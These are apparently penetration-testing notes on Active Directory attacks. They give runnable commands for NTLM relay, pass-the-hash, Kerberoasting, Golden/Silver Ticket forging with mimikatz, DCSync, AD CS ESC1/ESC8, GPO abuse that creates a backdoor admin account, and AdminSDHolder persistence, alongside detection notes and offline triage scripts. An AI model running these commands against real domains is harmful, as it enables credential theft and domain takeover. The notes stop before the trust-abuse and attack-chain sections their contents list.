2.1 Windows Active Directory — Attack Vectors & Paths
Authorized use only: Use these notes only in owned, explicitly authorized, or isolated lab environments.
Detection awareness: Assume commands, binaries, network calls, identity changes, and cloud or directory actions may be logged by endpoint tooling, audit frameworks, SIEM pipelines, proxy logs, DNS logs, auth logs, and platform telemetry.
Blue-team view: Treat every technique as a defender validation exercise too: note what artifacts it creates, what alerts or hunts could surface it, and what monitoring or hardening would prevent or contain it.
CTF/lab boundary: If a sandbox or CTF includes bypass-oriented exercises, keep them confined to that environment and translate the lesson into detection, prevention, and cleanup notes rather than real-world evasion guidance.
Scope: This document covers how attackers identify, enumerate, and abuse misconfigurations and design weaknesses in Windows Active Directory environments. Each section follows the pattern: What it is → How attackers spot it → How they abuse it.
Table of Contents
- Reconnaissance & Enumeration
- Credential-Based Attacks
- Kerberos Abuse
- ACL / ACE Abuse
- Active Directory Certificate Services (AD CS)
- Group Policy Abuse
- Lateral Movement via Windows Services
- Domain Persistence
- Trust Relationship Abuse
- Common Attack Chains (Full Paths)
1. Reconnaissance & Enumeration
What It Is
Before attacking, adversaries need to understand the AD environment — domain structure, users, groups, computers, GPOs, trusts, and service accounts.
How Attackers Spot the Opportunity
AD exposes a massive amount of information to any authenticated domain user by default. LDAP queries require no special privileges, and most environments leave default read permissions in place.
Common enumeration techniques:
LDAP Enumeration
# Native: the .NET call works on any domain-joined host; the Get-AD* cmdlets need the ActiveDirectory module (RSAT), which is common on admin workstations and servers
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-ADUser -Filter * -Properties *                     # every attribute of every user: complete, but noisy in LDAP logs
Get-ADGroup -Filter * | Select Name
Get-ADComputer -Filter * -Properties OperatingSystem
BloodHound / SharpHound — Maps the entire AD graph, including attack paths to Domain Admin:
# Run collector on any domain-joined box as a standard user
.\SharpHound.exe -c All --outputdirectory C:\temp
# Import the ZIP into BloodHound GUI → query "Shortest path to DA"
PowerView
# Enumerate shares, sessions, local admins, trust paths (current PowerView names; older builds use Get-NetDomain, Get-NetUser, Invoke-ShareFinder)
Get-Domain
Get-DomainUser -SPN                  # find service accounts → Kerberoasting targets
Find-LocalAdminAccess                # where does this user have local admin? (connects to every host, so it is loud)
Get-DomainTrust                      # enumerate all trust relationships
Find-DomainShare -CheckShareAccess   # find shares across the domain that the current user can actually read
How They Abuse It
Enumeration feeds every subsequent attack. The output of BloodHound directly answers: "What is the shortest path from my current user to Domain Admin?" Attackers use it to:
- Identify Kerberoastable / ASREPRoastable accounts
- Find users with DCSync rights
- Find paths via ACL misconfigurations
- Locate computers where high-value sessions exist
2. Credential-Based Attacks
2.1 Password Spraying
What it is: Testing one or a few common passwords across many accounts to avoid lockout.
How attackers spot it: Any list of valid usernames (from LDAP enum, LinkedIn, email format guessing) combined with a weak password policy.
How they abuse it:
# Spray from Linux using kerbrute (Kerberos pre-auth: one AS-REQ per account; failures still increment badPwdCount, so lockout is only avoided by staying under the threshold)
kerbrute passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Winter2024!'
# From Windows using Invoke-DomainPasswordSpray (reads the domain lockout policy itself and warns before exceeding it)
Invoke-DomainPasswordSpray -Password 'Spring2025!' -OutFile hits.txt
Lockout avoidance: attackers keep attempts per account below lockoutThreshold within the lockout observation window; both values come from net accounts /domain (or Get-ADDefaultDomainPasswordPolicy, plus any fine-grained policies from Get-ADFineGrainedPasswordPolicy -Filter *). Blue-team view: a spray is one source IP producing 4771 (Kerberos) or 4625/4776 (NTLM) failures across many distinct accounts, each account failing only once or twice, so cluster on the source rather than on the account.
2.2 NTLM Hash Capture & Relay
What it is: Capturing Net-NTLMv2 challenge-responses in transit and either cracking them offline or relaying them to authenticate elsewhere. A captured challenge-response is not an NTLM hash: it cannot be used for pass-the-hash, only cracked or relayed while the challenge is live.
How attackers spot it:
- LLMNR / NBT-NS still enabled (default on Windows clients)
- SMB signing not required on the relay targets (check with nmap -p445 --script smb-security-mode,smb2-security-mode 10.10.10.0/24 ; relaying only works to hosts that do not enforce signing)
- NTLM still enabled network-wide (no "Network security: Restrict NTLM" policy)
How they abuse it:
# Step 1: Poison LLMNR/NBT-NS with Responder (flag set varies by Responder version; check responder -h)
sudo responder -I eth0 -wv
# Captures Net-NTLMv2 responses from machines that mistype a hostname
# Step 2a: Crack offline
hashcat -m 5600 captured.hash /usr/share/wordlists/rockyou.txt
# Step 2b: Relay to other hosts (only those without mandatory SMB signing)
sudo ntlmrelayx.py -tf targets.txt -smb2support
# Authenticates to each target in targets.txt as the captured user; the default action dumps the SAM, which requires that user to be a local admin there
# When relaying, turn off Responder's SMB and HTTP servers in Responder.conf, otherwise Responder captures what ntlmrelayx should relay
2.3 Pass-the-Hash (PtH)
What it is: Using an NTLM hash directly to authenticate without knowing the plaintext password.
How attackers spot it: Dump hashes from the SAM (local accounts), LSASS (currently logged-on users) or NTDS.dit (every account in the domain). A domain account's hash works on every host where that account has rights. A local account's hash only works on other hosts where the same local account and password exist, and for local admins other than RID 500 only if LocalAccountTokenFilterPolicy is 1 (UAC remote restrictions otherwise strip the admin token over the network).
How they abuse it:
# Move laterally with impacket
impacket-psexec -hashes :aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c473d68ae76 corp/administrator@10.10.10.5
# Or with CrackMapExec
crackmapexec smb 10.10.10.0/24 -u administrator -H 5fbc3d5fec8206a30f4b6c473d68ae76
2.4 Pass-the-Ticket (PtT)
What it is: Stealing a valid Kerberos ticket (TGT or TGS) from memory and injecting it to authenticate as that user.
How attackers spot it: Tickets for every logged-on user sit in LSASS on that host. A user can always dump their own tickets; dumping other sessions' tickets (the interesting ones) needs local admin / SYSTEM on that machine, which is why session enumeration (who is logged in where) feeds this attack.
How they abuse it:
# Dump tickets from memory (run elevated, otherwise only the current logon session is visible)
.\Rubeus.exe dump /nowrap
# Inject a stolen ticket into the current session
.\Rubeus.exe ptt /ticket:<base64_ticket>
# Verify
klist
3. Kerberos Abuse
3.1 Kerberoasting
What it is: Any domain user can request a service ticket (TGS) for any account with a Service Principal Name (SPN). The ticket is encrypted with the service account's long-term key, which for RC4 (etype 23) is its NTLM hash, so the password can be attacked offline.
How attackers spot it:
# Find Kerberoastable accounts (user objects with an SPN; krbtgt and machine accounts are not worth cracking)
Get-ADUser -Filter 'ServicePrincipalName -like "*" -and SamAccountName -ne "krbtgt"' -Properties ServicePrincipalName,PasswordLastSet,msDS-SupportedEncryptionTypes
# Or with PowerView:
Get-DomainUser -SPN
High-value targets: accounts with an SPN AND high privileges (e.g., svc_sql, svc_backup), an old PasswordLastSet, and RC4 still allowed (msDS-SupportedEncryptionTypes unset or including 4). AES-only accounts yield tickets that crack far more slowly.
How they abuse it:
# Request TGS for all SPNs and output crackable hashes (Rubeus asks for RC4 wherever the account allows it)
.\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
# Crack offline: 13100 for RC4 ($krb5tgs$23$), 19600/19700 for AES128/AES256 ($krb5tgs$17$ / $krb5tgs$18$)
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
Why it matters: Service accounts often have weak passwords set years ago and never rotated. Cracking gives a valid domain credential, sometimes with admin rights. Blue-team view: each request is a 4769 on the DC with encryption type 0x17; one account requesting tickets for many user SPNs within seconds is the signature.
3.2 AS-REP Roasting
What it is: Accounts with "Do not require Kerberos preauthentication" enabled get an AS-REP whose encrypted part is protected with their password-derived key, and the KDC hands it out to anyone who names the account. The attacker needs no credentials, only a list of candidate usernames and network access to a DC.
How attackers spot it:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth
How they abuse it:
# From Linux, no credentials needed (-dc-ip avoids relying on DNS for the domain name)
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1 -format hashcat -outputfile asrep.txt
# Crack
hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt
3.3 Golden Ticket
What it is: A forged TGT encrypted and signed with the KRBTGT account's key. Valid for any user, any service, any machine: essentially unlimited domain access for as long as the KRBTGT key is unchanged.
How attackers spot the opportunity: After obtaining Domain Admin or DCSync rights, dump the KRBTGT hash.
How they abuse it:
# Dump KRBTGT hash (requires DA / DCSync rights)
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" exit
# Forge a Golden Ticket. Since the Nov 2021 PAC hardening /user must be a real account; /aes256:<key> instead of /krbtgt:<ntlm> avoids an RC4 ticket standing out in an AES-only domain
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /krbtgt:<hash> /ptt" exit
# Now you have a ticket injected: access anything
dir \\dc01\C$
Why it matters: mimikatz sets a 10-year lifetime by default, far beyond the domain's TGT policy, and the ticket survives password resets of regular accounts. Only resetting KRBTGT kills it, and the reset must be done twice (the KDC still accepts tickets under the previous key) with a replication pause between the two resets.
3.4 Silver Ticket
What it is: A forged TGS for one service, encrypted with that service account's key (for host services such as CIFS this is the computer account's hash). The target accepts it without contacting the DC, so there is no 4769 for it, and services running as SYSTEM do not perform PAC validation.
How they abuse it:
# Forge a Silver Ticket for the CIFS service on a target host (/rc4 is the NTLM hash of the computer account fileserver$)
.\mimikatz.exe "kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-21-... /target:fileserver.corp.local /service:cifs /rc4:<service_account_hash> /ptt" exit
3.5 Unconstrained Delegation
What it is: When a user authenticates to a host configured with Unconstrained Delegation, the client sends its TGT along with the service ticket and the host caches it in LSASS. An attacker with SYSTEM on such a host can steal those TGTs, including the DC's machine account TGT if the DC can be made to connect. Members of Protected Users and accounts marked "Account is sensitive and cannot be delegated" never forward a TGT. Domain controllers are unconstrained by design, so exclude them from the results.
How attackers spot it:
# Find systems with Unconstrained Delegation (PrimaryGroupID 516 = Domain Controllers)
Get-ADComputer -Filter {TrustedForDelegation -eq $true -and PrimaryGroupID -ne 516} -Properties TrustedForDelegation
Get-ADUser -Filter {TrustedForDelegation -eq $true}
How they abuse it (PrinterBug / SpoolSample):
# Coerce the DC to authenticate to our controlled host (needs the Print Spooler service running on the DC; PetitPotam / EFSRPC is the usual alternative)
.\SpoolSample.exe DC01 ATTACKER-HOST
# On attacker host (with Unconstrained Delegation), grab the DC's TGT; Rubeus must run elevated to see it
.\Rubeus.exe monitor /interval:5 /filteruser:DC01$
# Use the DC$ TGT → DCSync → full domain compromise
.\Rubeus.exe ptt /ticket:<DC_TGT>
.\mimikatz.exe "lsadump::dcsync /user:corp\krbtgt" exit
3.6 Constrained Delegation Abuse
What it is: Accounts/computers allowed to delegate to the specific services listed in msDS-AllowedToDelegateTo (S4U2Proxy). If the account also has "Use any authentication protocol" (TrustedToAuthForDelegation, protocol transition), it can use S4U2Self to obtain a ticket for any user without that user ever authenticating, so controlling the account means impersonating anyone (except Protected Users / sensitive accounts) to the listed services. Without protocol transition, a forwardable ticket from the victim is needed first. The service name inside the ticket is not protected, so cifs, host or ldap on the same host are reachable via /altservice even if only http is listed.
How attackers spot it:
# userAccountControl bit 0x1000000 (TRUSTED_TO_AUTH_FOR_DELEGATION) set = protocol transition
Get-ADObject -Filter 'msDS-AllowedToDelegateTo -like "*"' -Properties msDS-AllowedToDelegateTo,userAccountControl
How they abuse it:
# Get TGT for the constrained delegation account, then forge a service ticket as Domain Admin (add /altservice:cifs,host to reach other services on the same host)
.\Rubeus.exe s4u /user:svc_IIS /rc4:<hash> /impersonateuser:Administrator /msdsspn:"http/webserver.corp.local" /ptt
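The four "How attackers spot it" queries in this chapter (SPN accounts, pre-auth not required, unconstrained and constrained delegation) all reduce to reading a few attributes and userAccountControl bits. The Python script below, added here as an example and not part of the original notes, performs that triage offline over constructed LDAP-style records. The account names, SPNs and delegation targets in SAMPLE_ENTRIES are made up; the bit values are the documented userAccountControl flags. It also reads adminCount so that protected accounts lacking the NOT_DELEGATED flag stand out, which is the delegation target an attacker is after.

```python
# Added example (not part of the original notes): triage the userAccountControl
# bits and attributes that the Kerberos sections above look for. SAMPLE_ENTRIES
# is constructed test data shaped like LDAP results; names and SPNs are made up.
UF_SERVER_TRUST_ACCOUNT           = 0x00002000  # domain controller computer account
UF_TRUSTED_FOR_DELEGATION         = 0x00080000  # unconstrained delegation
UF_NOT_DELEGATED                  = 0x00100000  # "account is sensitive and cannot be delegated"
UF_DONT_REQUIRE_PREAUTH           = 0x00400000  # AS-REP roastable
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition


def triage(entry):
    """Return (finding, detail) pairs for one LDAP-style entry (dict of attributes)."""
    uac = entry.get("userAccountControl", 0)
    sam = entry["sAMAccountName"]
    spns = entry.get("servicePrincipalName", [])
    allowed_to = entry.get("msDS-AllowedToDelegateTo", [])
    is_machine = sam.endswith("$")
    is_dc = bool(uac & UF_SERVER_TRUST_ACCOUNT)
    findings = []

    if uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append(("asrep-roast", sam))

    # Kerberoast candidates are user accounts with an SPN. Machine accounts have
    # random 120-character passwords and krbtgt's "service" is the TGT itself,
    # so neither is a useful cracking target.
    if spns and not is_machine and sam.lower() != "krbtgt":
        findings.append(("kerberoast", f"{sam}: {', '.join(spns)}"))

    # Every DC is unconstrained by design; only non-DC hosts/users are findings.
    if uac & UF_TRUSTED_FOR_DELEGATION and not is_dc:
        findings.append(("unconstrained-delegation", sam))

    if allowed_to:
        if uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
            mode = "protocol transition: S4U2Self lets it impersonate anyone"
        else:
            mode = "Kerberos only: needs a forwardable ticket from the victim"
        findings.append(("constrained-delegation", f"{sam} -> {', '.join(allowed_to)} ({mode})"))

    # adminCount=1 marks accounts protected by AdminSDHolder. If such an account
    # is not flagged NOT_DELEGATED, a delegation host can impersonate it.
    if entry.get("adminCount") == 1 and not uac & UF_NOT_DELEGATED:
        findings.append(("admin-delegatable", sam))

    return findings


def triage_all(entries):
    """Flatten to (sAMAccountName, finding) pairs across all entries."""
    return [(e["sAMAccountName"], f) for e in entries for f, _ in triage(e)]


SAMPLE_ENTRIES = [  # constructed test data
    {"sAMAccountName": "DC01$", "userAccountControl": 0x82000,          # DC: unconstrained by design
     "servicePrincipalName": ["ldap/dc01.corp.local"]},
    {"sAMAccountName": "WEB01$", "userAccountControl": 0x81000},        # member server, unconstrained
    {"sAMAccountName": "svc_sql", "userAccountControl": 0x10200,        # user with SPN, password never expires
     "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"]},
    {"sAMAccountName": "svc_iis", "userAccountControl": 0x1010200,      # constrained + protocol transition
     "msDS-AllowedToDelegateTo": ["http/webserver.corp.local"]},
    {"sAMAccountName": "legacy_app", "userAccountControl": 0x410200},   # pre-auth not required
    {"sAMAccountName": "krbtgt", "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "da.jsmith", "userAccountControl": 0x200, "adminCount": 1},
]

if __name__ == "__main__":
    for name, finding in triage_all(SAMPLE_ENTRIES):
        print(f"{finding:26} {name}")
```

Feed it the output of an LDAP query (ldapsearch, ldap3, or Get-ADObject exported as JSON) with the same attribute names and the classification is the same one the Rubeus and Get-AD* commands above would lead to, with the DC and krbtgt noise already removed.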
4. ACL / ACE Abuse
What It Is
Active Directory objects have Access Control Lists (ACLs) with Access Control Entries (ACEs). Misconfigurations allow low-privileged users to modify high-privileged objects — users, groups, GPOs, computers.
How Attackers Spot It
BloodHound is the primary tool; query "Find Shortest Paths to Domain Admins". Common abusable ACEs:
| ACE | What It Allows |
|---|---|
| GenericAll | Full control over the object (everything below) |
| GenericWrite | Write non-protected attributes: member on a group (add yourself), servicePrincipalName on a user (targeted Kerberoasting) |
| WriteOwner | Take ownership of the object, then grant yourself WriteDACL |
| WriteDACL | Modify the ACL itself, e.g. grant yourself GenericAll or DCSync |
| ForceChangePassword | Reset a user's password without knowing the current one (User-Force-Change-Password extended right) |
| AddMember | Write the group's member attribute (WriteProperty on member) |
| AllExtendedRights | Every extended right: force-change-password on users; on the domain object it includes the replication rights that make up DCSync |
How They Abuse It
Reset a user's password (ForceChangePassword):
$pass = ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force
Set-ADAccountPassword -Identity TargetUser -NewPassword $pass -Reset
Add self to a group (AddMember / GenericAll on group):
Add-ADGroupMember -Identity "Domain Admins" -Members attacker_user
WriteDACL → grant self DCSync rights:
# Using PowerView
Add-DomainObjectAcl -TargetIdentity "DC=corp,DC=local" -PrincipalIdentity attacker_user -Rights DCSync
DCSync (once DCSync ACE is granted):
.\mimikatz.exe "lsadump::dcsync /user:corp\krbtgt /domain:corp.local" exit
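As an added example (not from the original notes and not BloodHound's own code), the Python script below shows the graph walk behind BloodHound's "shortest path to Domain Admins" query, using the ACE types from the table above as edges. OBJECTS and ACES are constructed; every principal, group and right in them is hypothetical. Each edge in a resulting path maps to one of the abuse commands above: ForceChangePassword to Set-ADAccountPassword, GenericWrite or AddMember on a group to Add-ADGroupMember, WriteDacl on the domain to Add-DomainObjectAcl -Rights DCSync.

```python
# Added example (not part of the original notes): a BloodHound-style shortest
# path search over an attack graph built from abusable ACEs. OBJECTS and ACES
# are constructed; all names below are made up for illustration.
from collections import deque

# Rights that hand the holder control of a target of the given class. Anything
# else (ReadProperty, ListChildren, ...) is not an edge.
ABUSABLE = {
    "user":   {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
               "ForceChangePassword", "AllExtendedRights"},
    "group":  {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl", "AddMember"},
    "gpo":    {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl"},
    "domain": {"GenericAll", "WriteOwner", "WriteDacl", "AllExtendedRights", "DCSync"},
}

OBJECTS = {  # name -> object class (constructed)
    "bob": "user", "alice": "user", "svc_backup": "user",
    "helpdesk": "group", "IT Admins": "group", "Domain Admins": "group",
    "corp.local": "domain",
}

ACES = [  # (principal, right, target), constructed; MemberOf is group membership
    ("bob", "MemberOf", "helpdesk"),
    ("helpdesk", "ForceChangePassword", "svc_backup"),
    ("svc_backup", "GenericWrite", "IT Admins"),      # GenericWrite on a group: write member
    ("IT Admins", "WriteDacl", "corp.local"),         # WriteDACL on the domain: grant self DCSync
    ("helpdesk", "ReadProperty", "Domain Admins"),    # harmless, must not become an edge
    ("alice", "AddMember", "Domain Admins"),
    ("Domain Admins", "GenericAll", "corp.local"),
]


def build_graph(objects, aces):
    """Adjacency list: principal -> [(right, controlled_object), ...]."""
    graph = {name: [] for name in objects}
    for principal, right, target in aces:
        if right == "MemberOf" or right in ABUSABLE[objects[target]]:
            graph[principal].append((right, target))
    return graph


def shortest_path(graph, start, goal):
    """Breadth-first search; returns [(node, right_used_to_reach_node), ...] or None."""
    came_from = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for right, nxt in graph[node]:
            if nxt not in came_from:
                came_from[nxt] = (node, right)
                queue.append(nxt)
    if goal not in came_from:
        return None
    path, node = [], goal
    while node is not None:
        step = came_from[node]
        path.append((node, step[1] if step else None))
        node = step[0] if step else None
    return path[::-1]


def render(path):
    """'bob -> [MemberOf] helpdesk -> [ForceChangePassword] svc_backup -> ...'"""
    return " -> ".join(node if right is None else f"[{right}] {node}" for node, right in path)


if __name__ == "__main__":
    g = build_graph(OBJECTS, ACES)
    for who in ("bob", "alice"):
        p = shortest_path(g, who, "corp.local")
        print(render(p) if p else f"{who}: no path")
```

BloodHound's real graph also carries sessions, local admin rights, GPO links and trusts as edges; the ACE subset here is enough to see why a ReadProperty ACE never appears in a path while a single WriteDacl on the domain object ends one.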
5. Active Directory Certificate Services (AD CS)
What It Is
AD CS issues X.509 certificates for authentication, encryption, and code signing. Certificate templates with weak settings are a direct path to credential theft and persistence.
ESC1 — Misconfigured Certificate Templates
How attackers spot it:
# Enumerate with Certipy
certipy find -u attacker@corp.local -p 'Password1' -dc-ip 10.10.10.1 -vulnerable
ESC1 needs all of the following on one published template:
- CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT is set in msPKI-Certificate-Name-Flag (the requester controls the SAN)
- An authentication EKU is present (Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU at all)
- Low-privileged users have Enroll rights on the template (and on the CA)
- Manager approval is disabled and no authorized signatures are required
How they abuse it:
# Request a cert as Domain Admin: you supply the SAN
certipy req -u attacker@corp.local -p 'Password1' -dc-ip 10.10.10.1 -ca 'corp-CA' -template 'VulnerableTemplate' -upn 'administrator@corp.local'
# Authenticate with the cert (PKINIT) → TGT plus the DA's NTLM hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
Caveat: with KB5014754 strong certificate mapping enforced, the DC rejects authentication certificates that lack the SID security extension; recent Certipy releases can include it in the request. Blue-team view: a 4887 (certificate issued) whose SAN UPN differs from the requesting account is the tell.
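The ESC1 conditions above, written out as code. This Python check is an added example, not Certipy's implementation and not code from the original notes; it operates on constructed template records whose keys mirror the pKICertificateTemplate LDAP attributes Certipy reads. Template names and enrollment ACLs in SAMPLE_TEMPLATES are made up; the flag bits and EKU OIDs are the documented values.

```python
# Added example (not part of the original notes): the ESC1 test over
# certificate-template records shaped like the LDAP attributes Certipy reads.
# SAMPLE_TEMPLATES is constructed; flag bits and EKU OIDs are the real values.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS         = 0x00000002  # in msPKI-Enrollment-Flag: manager approval

# EKUs that make the issued certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def allows_auth(ekus):
    """No EKU at all means 'any purpose', which includes authentication."""
    return not ekus or bool(set(ekus) & AUTH_EKUS)


def esc1_blockers(tpl):
    """Return the conditions that stop ESC1 on this template; an empty list means vulnerable."""
    blockers = []
    if not tpl["enabled"]:
        blockers.append("not published on any CA")
    if not tpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        blockers.append("subject built from AD, requester cannot choose SAN")
    if not allows_auth(tpl["pKIExtendedKeyUsage"]):
        blockers.append("no authentication EKU")
    if tpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        blockers.append("manager approval required")
    if tpl["msPKI-RA-Signature"] > 0:
        blockers.append("authorized signature required")
    if not set(tpl["enroll"]) & LOW_PRIV:
        blockers.append("enroll restricted to privileged principals")
    return blockers


def find_esc1(templates):
    return [t["name"] for t in templates if not esc1_blockers(t)]


def template(name, name_flag, ekus, enroll, enrollment_flag=0, ra_sig=0, enabled=True):
    return {"name": name, "enabled": enabled, "msPKI-Certificate-Name-Flag": name_flag,
            "pKIExtendedKeyUsage": ekus, "msPKI-Enrollment-Flag": enrollment_flag,
            "msPKI-RA-Signature": ra_sig, "enroll": enroll}


SAMPLE_TEMPLATES = [  # constructed
    # classic ESC1: requester picks the SAN, auth EKU, anyone can enroll, no approval
    template("VulnerableTemplate", 0x1, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"]),
    # stock User template: subject and UPN come from AD (0xA6000000 has bit 0x1 clear)
    template("User", 0xA6000000, ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"], ["Domain Users"]),
    # web server cert: requester supplies the subject but Server Authentication only
    template("WebServer", 0x1, ["1.3.6.1.5.5.7.3.1"], ["Domain Users"]),
    # same as VulnerableTemplate but a certificate manager must approve
    template("ApprovedAuth", 0x1, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"], enrollment_flag=0x2),
    # no EKU listed at all: "any purpose", still ESC1
    template("OpenNoEKU", 0x1, [], ["Authenticated Users"]),
    # requires one enrollment-agent signature
    template("AgentSigned", 0x1, ["1.3.6.1.5.5.7.3.2"], ["Domain Users"], ra_sig=1),
]

if __name__ == "__main__":
    for t in SAMPLE_TEMPLATES:
        verdict = esc1_blockers(t)
        print(f"{t['name']:18} {'ESC1' if not verdict else '; '.join(verdict)}")
```

Certipy additionally checks the CA (enabled, requester has Enroll on the CA object) and reports the web enrollment state; this check deliberately stops at the template, which is where the fix (clear the flag, require approval, or trim the Enroll ACL) is applied.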
ESC8 — NTLM Relay to AD CS HTTP Enrollment
How attackers spot it: The AD CS web enrollment endpoint (/certsrv) accepts NTLM over HTTP, or over HTTPS without Extended Protection for Authentication (EPA), combined with a way to coerce a privileged account to authenticate to the attacker (PrinterBug, PetitPotam). The unauthenticated EFSRPC coercion was patched (CVE-2021-36942, August 2021); on patched DCs the coercion usually needs a low-privileged domain credential.
How they abuse it:
# Relay NTLM auth from DC to AD CS → get DC$ certificate → DCSync
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
# Coerce DC auth (PrinterBug / PetitPotam; add -u/-p/-d for the authenticated variant)
python3 PetitPotam.py attacker-ip dc01.corp.local
# Use the issued cert (ntlmrelayx prints it base64-encoded; decode and save it as dc01.pfx)
certipy auth -pfx dc01.pfx -dc-ip 10.10.10.1
6. Group Policy Abuse
What It Is
Group Policy Objects (GPOs) control configuration across the domain. If an attacker can write to a GPO that applies to high-value machines or users, they can deploy malicious settings.
How Attackers Spot It
# Find GPOs where low-priv principals (Domain Users RID 513, Authenticated Users, Everyone) hold write rights
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner' -and $_.SecurityIdentifier -match '^S-1-5-21-.*-513$|^S-1-5-11$|^S-1-1-0$' }
# Resolve other SIDs with ConvertFrom-SID; also check NTFS rights on each GPO's gPCFileSysPath in SYSVOL, where the settings actually live
BloodHound: Query "Find GPO Objects Where Domain Users Can Modify"
How They Abuse It
# Using SharpGPOAbuse: push settings through a writable GPO; which machines are hit depends on where the GPO is linked
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Pwn" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c net user backdoor P@ssw0rd /add && net localgroup administrators backdoor /add" --GPOName "Vulnerable GPO"
# gpupdate /force only refreshes the machine it runs on; targets pick the change up at their next background refresh (90 minutes plus a random offset of up to 30 on members, 5 minutes on DCs)
gpupdate /force
7. Lateral Movement via Windows Services
7.1 WinRM / PowerShell Remoting
How attackers spot it:
# Check if WinRM is open
nmap -p 5985,5986 10.10.10.0/24
crackmapexec winrm 10.10.10.0/24 -u user -p password
How they abuse it:
# Enter remote session
Enter-PSSession -ComputerName TARGET -Credential $cred
# Or with Evil-WinRM
evil-winrm -i 10.10.10.5 -u administrator -p 'Password1'
7.2 WMI Lateral Movement
How attackers spot it: WMI is enabled by default. If an account has local admin, WMI is a valid remote execution path.
How they abuse it:
# Remote execution via WMI (no tool needed)
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt" -ComputerName TARGET -Credential $cred
# With CrackMapExec
crackmapexec smb 10.10.10.5 -u admin -p 'Password1' -x "whoami" --exec-method wmiexec
7.3 DCOM Lateral Movement
How attackers spot it: DCOM objects (MMC20, ShellWindows, ShellBrowserWindow) allow remote code execution when local admin access exists.
How they abuse it:
# Using DCOM MMC20.Application object
# Activates the object remotely over DCOM (TCP 135 plus a dynamic port); needs local admin on the target and DCOM allowed through its firewall
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID("MMC20.Application", "10.10.10.5"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, '/c calc.exe', '7')
7.4 SCM / Remote Service Creation (PsExec-style)
How attackers spot it: SMB (TCP 445) open and the ADMIN$ share writable with the credentials or hash in hand, i.e. local admin on the target. SMB signing is irrelevant here (it only matters for relaying); with valid admin credentials these tools work regardless.
How they abuse it:
# psexec uploads a service binary to ADMIN$ and starts it; smbexec creates a short-lived service per command without dropping a file. Both log 7045 (service installed) on the target.
impacket-psexec corp/administrator:'Password1'@10.10.10.5
impacket-smbexec corp/administrator:'Password1'@10.10.10.5
8. Domain Persistence
8.1 DCSync (Simulated Domain Replication)
What it is: Any account with Replicating Directory Changes + Replicating Directory Changes All rights on the domain object can pull password hashes from a DC via DRSUAPI, exactly as a replication partner would; no shell on the DC is needed. DCs hold these rights by default, so any extra principal holding them is a persistence backdoor.
# Check who has DCSync rights (ObjectAceType DS-Replication-Get-Changes / -All); anything that is not a DC or a known sync account is suspect
Get-DomainObjectAcl -Identity "DC=corp,DC=local" -ResolveGUIDs | Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' } | ForEach-Object { ConvertFrom-SID $_.SecurityIdentifier }
# Perform DCSync
.\mimikatz.exe "lsadump::dcsync /domain:corp.local /all /csv" exit
8.2 AdminSDHolder Abuse
What it is: AdminSDHolder (CN=AdminSDHolder,CN=System) is a template object whose ACL the SDProp process copies onto every protected object (Domain Admins, Enterprise Admins, Administrators, their members and the other adminCount=1 accounts) every 60 minutes by default.
How they abuse it: Write a malicious ACE to AdminSDHolder and it propagates to every protected object. If a defender removes the ACE from Domain Admins directly, SDProp puts it back on the next run, so the backdoor only dies when AdminSDHolder itself is cleaned.
# Grant attacker GenericAll on AdminSDHolder → propagates to DA within 60 min (5136 on AdminSDHolder is the artefact)
Add-DomainObjectAcl -TargetIdentity "CN=AdminSDHolder,CN=System,DC=corp,DC=local" -PrincipalIdentity attacker_user -Rights All
